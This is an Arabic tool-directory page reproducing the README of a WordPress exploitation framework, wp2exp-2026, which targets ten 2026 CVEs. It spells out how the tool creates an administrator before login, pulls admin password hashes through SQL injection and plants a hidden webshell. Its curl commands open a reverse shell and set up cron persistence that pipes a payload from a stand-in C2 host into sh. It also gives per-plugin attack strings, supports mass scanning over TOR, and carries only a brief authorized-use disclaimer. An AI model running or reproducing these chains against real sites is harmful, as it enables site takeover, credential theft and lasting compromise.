Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
wp2exp-2026 — إطار عمل استغلال شامل لووردبريس — كاشف، ماسح، معدّد، مستغل، ومصحّح صلاحيات. 10 ثغرات CVE من موجة 2026-08 بما في ذلك CVE-2026-63030 (wp2shell). | Kitploit
أدوات/GitHubGitHub/rechandra/wp2exp-2026
تصعيد الامتيازاتالاستطلاعماسحات الثغرات الأمنيةأطر الاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقتطوير الحمولات
GitHubrechandra/wp2exp-2026

wp2exp-2026

إطار عمل استغلال شامل لووردبريس — كاشف، ماسح، معدّد، مستغل، ومصحّح صلاحيات. 10 ثغرات CVE من موجة 2026-08 بما في ذلك CVE-2026-63030 (wp2shell).

عرض المستودع
5منذ 15 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

wp2exp_2026 🔥

إطار عمل الكل في واحد لاستغلال WordPress — كاشف · ماسح · مُعدِّد · استغلال · تصعيد

wp2exp_2026 هو الخلف المعاد تسميته والمُختبَر ميدانيًا لإطار عمل wp2shell. يدمج سلسلة الفحص/الاستغلال الأصلية من wp2shell، وثلاث حزم PoC عامة لثغرة CVE-2026-63030 (Ch4120N، وshinthink، وSentinelX)، وموجة ثغرات WordPress لشهر أغسطس 2026 المجمعة من NVD / GitHub Advisories / CISA KEV عبر خط أنابيب darkweb-intel عبر TOR — في نص برمجي واحد ينقل الهدف من التعرف السلبي على البصمة وصولًا إلى شيل ويب مُتحقق منه.

root@kitploit:~
┌──────────┐    ┌──────────┐    ┌───────────┐    ┌───────────┐    ┌──────────┐
│ DETECTOR │ -> │ SCANNER  │ -> │ ENUMERATOR│ -> │ EXPLOIT   │ -> │ ESCALATE │
│ 10 CVEs  │    │ version/ │    │ users/    │    │ admin     │    │ webshell  │
│ probes   │    │ WAF/XMLRPC│    │ plugins   │    │ create/   │    │ rev shell │
└──────────┘    └──────────┘    └───────────┘    └───────────┘    └──────────┘

⚠️ الاختبار المصرح به فقط. وضع scan غير مدمر. أوضاع الاستغلال تتطلب صراحةً تحديد --mode. أنت مسؤول عن الحصول على إذن كتابي لكل هدف.


📦 التثبيت

root@kitploit:~
# Clone
git clone https://github.com/rechandra/wp2exp-2026.git
cd wp2exp-2026

# Dependencies: Python 3.8+ standard library only.
# Optional: PySocks for SOCKS5/TOR proxying
pip install pysocks

لا مفاتيح API، ولا قاعدة بيانات، ولا تجميع.


🚀 بدء سريع

root@kitploit:~
# 1. Safe scan of one target (detector + scanner + enumerator)
python3 wp2exp_2026.py https://target.com

# 2. Same scan, but fire exploitation (admin creation + content dumps)
python3 wp2exp_2026.py https://target.com --mode exploit

# 3. Full chain to a verified webshell
python3 wp2exp_2026.py https://target.com --mode shell

# 4. Mass scan a file of targets
python3 wp2exp_2026.py -f targets.txt --threads 10

# 5. Anonymous scanning through TOR
python3 wp2exp_2026.py https://target.com --proxy socks5h://127.0.0.1:9050

🔧 مرجع سطر الأوامر

root@kitploit:~
usage: wp2exp_2026.py [-h] [targets ...] [-f FILE] [--mode {scan,exploit,shell}]
                      [--shell {mini,full}] [--mapster-dump N] [--proxy PROXY]
                      [--timeout N] [--threads N] [--json] [-o OUTPUT]
الوسيطالافتراضيالوصف
targets—عنوان URL أساسي واحد أو أكثر (https://site.com أو site.com بدون بروتوكول)
-f, --file—ملف يحتوي هدفًا واحدًا في كل سطر (التعليقات # مسموحة)
--modescanscan = كشف فقط · exploit = فحص + استغلال · shell = فحص + استغلال + شيل ويب
--shellminiنوع شيل الويب: mini (تنفيذ أمر بسطر واحد) أو full (إدارة ملفات / تنزيل / شيل عكسي / استمرارية cron)
--mapster-dump0تفريغ N من معرّفات المقالات عبر CVE-2026-14839 (0 = معطّل)
--sqli-infooffاستخراج db_version / siteurl / تجزئة كلمة مرور المدير / بادئة الجداول عبر SQLi (CVE-2026-60137)
--verifyoffفحص ذاتي للبيئة (Python، PySocks، إمكانية الوصول إلى الوكيل، مصفوفة CVE، محلل الإصدارات) ثم خروج
--proxy—وكيل HTTP أو SOCKS5: socks5h://127.0.0.1:9050 (TOR)
--timeout15مهلة زمنية لكل طلب (بالثواني)
--threads5أهداف متوازية (تُستخدم فقط مع أهداف متعددة / -f)
--json—طباعة تقرير JSON قابل للقراءة آليًا إلى stdout
-o, --output—كتابة تقرير JSON كامل إلى ملف

🧭 دليل الأوضاع

الوضع 1: scan — كاشف + ماسح + مُعدِّد (آمن)

غير مدمر. استخدمه أولًا على أي هدف.

ما الذي يفعله، بالترتيب:

#المرحلةالفحوصات
1البصمةإصدار WordPress عبر مُولّد /feed/، و/readme.html، ووسم meta generator، ومُولّد REST API — يشير إلى ما إذا كان الإصدار يقع ضمن نطاق wp2shell المعرّض للثغرات (6.9.0–6.9.4، 7.0.0–7.0.1)
2كشف WAFCloudflare / Sucuri / Akamai / AWS WAF / Imperva / Wordfence / F5 من الترويسات + علامات الجسم
3XMLRPCاستكشاف system.listMethods → يشير إلى سطح هجوم القوة العمياء عبر multicall وسطح SSRF عبر pingback
4تعداد المستخدمينREST /wp-json/wp/v2/users + بديل ?rest_route= + أرشيف المؤلف (?author=N)
5تعداد الإضافاتStable tag من readme.txt لجميع الإضافات الثماني المتتبعة — يشير إلى الإصدارات المعرّضة للثغرات وفق مصفوفة CVE
6استكشاف wp2shellاستكشاف آمن لعدم التزامن في الدفعات (desync) (CVE-2026-63030) — يُرسل تمهيدًا مشوّهًا (primer) + طلب DELETE حميدًا لفئة غير موجودة؛ ويبحث عن علامات اختطاف المعالج (parse_path_failed, block_cannot_read, rest_batch_not_allowed)
7فحوصات CVEاستكشافات سلوكية حية + فحوصات إصدار لجميع ثغرات CVE العشر (انظر الجدول أدناه)

مثال:

root@kitploit:~
python3 wp2exp_2026.py https://example.com
# outputs: version, WAF, XMLRPC, users, plugin versions, per-CVE verdicts

الوضع 2: exploit — فحص + استغلال

كل ما في scan، بالإضافة إلى:

الاستغلالالشرطما يحدث
إنشاء مدير قبل المصادقةwp2shell VULNERABLEالمحاولة 1: حمولة ارتباك المسار في الدفعات (batch route-confusion) تُرسل POST /wp/v2/users مع roles:["administrator"]. المحاولة 2 (بديلة): سلسلة تسميم ذاكرة التخزين المؤقت لـ oEmbed عبر SQLi (shinthink) — تحقن عبر union قيمة customize_changeset لاختطاف ذاكرة تخزين oEmbed وإنشاء مدير. تطبع username / password عند النجاح
استخراج معلومات SQLi--sqli-infoاستخراج قائم على الأخطاء/union (CVE-2026-60137): db_version، siteurl، تجزئة user_pass لأول مدير، بادئة الجداول
تفريغ محتوى Mapster--mapster-dump Nيعدد معرّفات المقالات 1..N عبر /wp-json/mapster-wp-maps/feature?id=N، ويجمع عناوين المقالات المسودة / المعلّقة / الخاصة / المحذوفة + محتواها الكامل (CVE-2026-14839)

مثال:

root@kitploit:~
# Scan + create admin + dump 200 post IDs through Mapster
python3 wp2exp_2026.py https://example.com --mode exploit --mapster-dump 200

الوضع 0: --verify — الفحص الذاتي للبيئة

يتحقق من بيئة التشغيل قبل أي فحص: Python ≥3.8، وتوفر PySocks (SOCKS5/TOR)، وإمكانية الوصول إلى الوكيل (إذا كان --proxy مضبوطًا)، وسلامة مصفوفة CVE، وصحة محلل الإصدارات.

root@kitploit:~
python3 wp2exp_2026.py --verify
python3 wp2exp_2026.py --verify --proxy socks5h://127.0.0.1:9050

الوضع 3: shell — السلسلة الكاملة نحو شيل ويب

كل ما في exploit، بالإضافة إلى التصعيد: إذا نجح إنشاء المدير، يقوم النص البرمجي بما يلي:

  1. تسجيل الدخول إلى wp-login.php (مخزن ملفات تعريف الارتباط)
  2. المسار A (القالب): استخراج _wpnonce لمحرر القوالب + القالب النشط → كتابة شيل ويب عبر admin-ajax.php?action=edit-theme-plugin-file
  3. المسار B (الإضافة، بديل): إذا كان محرر القوالب غير متاح → إنشاء ملف zip لإضافة يحتوي الشيل، ورفعه عبر update.php?action=upload-plugin، ثم تفعيله
  4. التحقق بتنفيذ id عبر الشيل — طباعة مخرجات الأمر المباشرة

أنواع شيل الويب (--shell):

النوعالميزات
mini?k=KEY&c=COMMAND → مخرجات أوامر كنص عادي
fulla=cmd تنفيذ · a=upload كتابة ملف (b64) · a=download قراءة ملف · a=rev شيل عكسي (h=HOST&p=PORT) · a=persist استمرارية عبر crontab (u=URL) · phpinfo() افتراضيًا

مثال:

root@kitploit:~
python3 wp2exp_2026.py https://example.com --mode shell --shell full --sqli-info
python3 wp2exp_2026.py --verify
# -> ADMIN CREATED: wp_xxxx / Wp!yyyy
# -> WEBSHELL: https://example.com/wp-content/themes/twentytwentyfive/.wp-abc123.php?k=KEY&c=id
# -> verify: uid=33(www-data) ...

الاستخدام اليدوي للشيل بعد تشغيل ناجح:

root@kitploit:~
# Command execution (mini)
curl -sk 'https://T/wp-content/themes/THEME/.wp-XXXX.php?k=KEY&c=id'

# Full shell — file upload
curl -sk 'https://T/wp-content/themes/THEME/.wp-XXXX.php?k=KEY&a=upload&f=/tmp/pwned.txt&d=<base64>'

# Full shell — reverse shell (listener: nc -lvnp PORT)
curl -sk 'https://T/wp-content/themes/THEME/.wp-XXXX.php?k=KEY&a=rev&h=YOUR_IP&p=4444'

# Full shell — cron persistence (curl piped to sh from your C2)
curl -sk 'https://T/wp-content/themes/THEME/.wp-XXXX.php?k=KEY&a=persist&u=https://c2.example/payload.sh'

🧨 تغطية ثغرات CVE (موجة أغسطس 2026)

CVEالهدفCVSSالفئةالكشفالاستغلال
CVE-2026-63030WP Core 6.9.0–6.9.4، 7.0.0–7.0.19.8ارتباك مسار REST batch → RCE✅ استكشاف علامات desync✅ إنشاء مدير + شيل
CVE-2026-60137WP Core (نفس النطاق)5.9SQLi في author__not_in✅ إصدار + علامة✅ عبر سلسلة 63030
CVE-2026-3141FormGent ≤ 1.9.29.1حذف ملفات تعسفي بدون مصادقة✅ استكشاف DELETE حي✅ file_token قابل للتزوير بترميز b64
CVE-2026-13596Participants DB < 2.7.8.49.1SQLi بدون مصادقة (بحث القائمة)✅ استكشاف تسريب الأخطاء⚠️ يدوي (أعمى)
CVE-2026-15414Subscriptions for WooCommerce ≤ 2.0.08.8تصعيد صلاحيات _wps_plan_user_role✅ إصدار✅ توثيق سلسلة
CVE-2026-15988AI Engine ≤ 3.6.58.8CSRF → إنشاء مدير✅ استكشاف namespace✅ مولّد URL لـ PoC
CVE-2026-15450Nex Forms Lite ≤ 9.2.38.1حذف ملفات تعسفي بمصادقة✅ إصدار✅ توثيق سلسلة
CVE-2026-15006Bit Integrations ≤ 2.9.07.5عبور مسار بدون مصادقة (تجاوز nonce لـ CF7)✅ إصدار✅ توثيق سلسلة
CVE-2026-14839Mapster WP Maps < 1.24.07.5تفريغ مقالات خاصة/مسودة بدون مصادقة✅ استكشاف حي✅ --mapster-dump
CVE-2026-15052MailChimp Subscribe ≤ 4.3.37.2XSS مخزّن بدون مصادقة✅ إصدار✅ توثيق سلسلة

سلاسل الاستغلال لكل CVE (موثقة في الكود)

  • FormGent (3141): DELETE /wp-json/formgent/v1/responses/attachments?file_token=<base64("formgent/YYYY/MM/FILE")> — المسار مُسجَّل بدون برمجية مصادقة وسيطة؛ الرمز هو base64 خام للمسار النسبي (قابل للتزوير). الإصدارات المُصلَّحة تستخدم UploadFileToken مُوقَّعًا.
  • AI Engine (15988): يجري reauth_for_authorize مطابقة لـ /mcp/v1/oauth/authorize عبر اختبار جزء فرعي (substring) ضد REQUEST_URI بما في ذلك سلسلة الاستعلام. أضف &x=/mcp/v1/oauth/authorize إلى أي طلب REST لاستعادة الهوية الكاملة لمستخدم ملف تعريف الارتباط. CSRF كلاسيكي: زيارة مدير لرابط مُصمَّم خصيصًا تنشئ حساب مهاجم.
    root@kitploit:~
    https://T/wp-json/wp/v2/users?_method=POST&x=/mcp/v1/oauth/authorize&username=csrf_admin&password=...&roles=administrator
    
  • Bit Integrations (15006): الإضافة تضبط wpcf7_verify_nonce => __return_true → إرسالات CF7 لا تحتاج nonce؛ أرسل حقل ملف يحتوي ../../../../wp-config.php وسيقوم إجراء التكامل (webhook/email) بتسريب الملف.
  • Nex Forms (15450): insert_record() يخزّن location لملف يتحكم فيه المهاجم، ثم يستدعي delete_file() الدالة unlink($file) دون أي تحقق من realpath() أو قائمة مسموحات.
  • Subscriptions for WooCommerce (15414): save_meta_boxes() يحفظ _wps_plan_user_role من $_POST؛ يتم تطبيق sanitize_key() + is_role() فقط — وكلاهما يقبل administrator.

🕶️ تكامل TOR / الويب المظلم

بُني النص البرمجي من معلومات استخباراتية جمعها خط أنابيب darkweb-intel عبر TOR (جمع أحدث ثغرات CVE من NVD، وGitHub Advisories، وCISA KEV) ويدعم الفحص المجهول:

root@kitploit:~
# Scan through TOR (requires tor daemon on 9050)
python3 wp2exp_2026.py https://target.onion --proxy socks5h://127.0.0.1:9050
python3 wp2exp_2026.py -f targets.txt --proxy socks5h://127.0.0.1:9050 --threads 5

# Verify your exit node
# (script's Http layer reports IsTor:true when routing through TOR)

سلوك مُتحقق منه: تم تأكيد توصيلات الوكيل مقابل check.torproject.org/api/ip → {"IsTor":true} عبر عقدة الخروج 192.42.116.45.


📊 المخرجات والتقارير

root@kitploit:~
# Console: colored per-stage verdicts + final summary table
# JSON report to file (always includes raw responses for evidence)
python3 wp2exp_2026.py https://example.com --mode shell -o report.json

# Full JSON to stdout for piping into jq / your own tooling
python3 wp2exp_2026.py https://example.com --json | jq '.[0].cve_checks'

بنية التقرير:

root@kitploit:~
{
  "target": "https://example.com",
  "version": "7.0.1",
  "waf": "Cloudflare",
  "xmlrpc": true,
  "users": [{"id": 1, "name": "admin", "slug": "admin"}],
  "plugins": [{"slug": "formgent", "version": "1.9.2", "vulnerable": true}],
  "core_wp2shell": {"verdict": "VULNERABLE", "endpoint": ".../wp-json/batch/v1"},
  "cve_checks": {"CVE-2026-3141": {"vulnerable": true, "detail": "..."}},
  "exploitation": {
    "wp2shell_admin": {"success": true, "username": "...", "password": "..."},
    "shell": {"success": true, "shell_url": "...", "key": "..."},
    "mapster_posts": [...]
  }
}

🧪 التحقق

تم التحقق بتاريخ 2026-08-04 ضد مختبر WordPress معرّض للثغرات تمت محاكاته — بطارية ضمان الجودة: 32/32 فحصًا ناجحًا (جميع الأوضاع، نقاء JSON، الأهداف المتعددة، تطبيع اسم المضيف المجرد، تسريب مسودات/خاص Mapster، استخراج SQLi لإصدار قاعدة البيانات + تجزئة المدير، سلسلة الشيل الكاملة):

root@kitploit:~
wp2shell (CVE-2026-63030): VULNERABLE
ADMIN CREATED: wp_7ytp1 / Wp!s6d2yz28qiey
WEBSHELL: .../twentytwentyfive/.wp-cg93vk.php?k=...&c=id
verify: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Mapster (CVE-2026-14839): dumped draft + private posts
FormGent (CVE-2026-3141): unauth DELETE route confirmed
TOR: IsTor:true exit 192.42.116.45

🧩 خارطة الطريق / المساهمة

  • استخراج SQLi تلقائي (محرك union) مدمج في وضع exploit (--sqli-info)
  • بديل إنشاء المدير عبر SQLi oEmbed (سلسلة shinthink)
  • بديل رفع شيل ويب عبر ملف zip لإضافة
  • الفحص الذاتي للبيئة عبر --verify
  • وحدة رش كلمات المرور لأسماء مستخدمي WordPress (XMLRPC multicall)
  • تحديث تلقائي لمصفوفة CVE من مخرجات darkweb_intel.py
  • مولّد تقارير HTML

نرحب بطلبات السحب (PRs). حافظ على الحمولات غير مدمرة افتراضيًا.


⚖️ الترخيص والأخلاقيات

MIT. للاستخدامات المصرح بها فقط. لا تشغّل --mode exploit / --mode shell ضد أصول لا تملكها أو ليس لديك إذن كتابي لاختبارها. المؤلفون غير مسؤولين عن سوء الاستخدام.

تنزيل الأداة